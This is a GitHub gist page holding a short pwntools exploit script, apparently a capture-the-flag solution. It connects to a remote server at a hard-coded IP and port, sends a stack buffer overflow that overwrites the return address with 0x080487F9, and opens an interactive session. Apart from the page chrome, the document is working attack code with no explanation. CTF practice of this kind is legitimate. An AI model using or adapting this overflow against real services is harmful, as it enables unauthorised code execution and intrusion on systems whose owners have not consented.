Skip to content

Instantly share code, notes, and snippets.

@crixpwn
Last active May 28, 2017 00:40
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save crixpwn/6d086c9ce6ada66fa2049bf33fd9d2bb to your computer and use it in GitHub Desktop.
Save crixpwn/6d086c9ce6ada66fa2049bf33fd9d2bb to your computer and use it in GitHub Desktop.
from pwn import *
r = remote("223.194.105.182", 22901)
def main():
payload = "A" * 0x1c
payload += "BBBB"
payload += p32(0x080487F9)
r.send(payload)
r.interactive()
if __name__=='__main__':
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment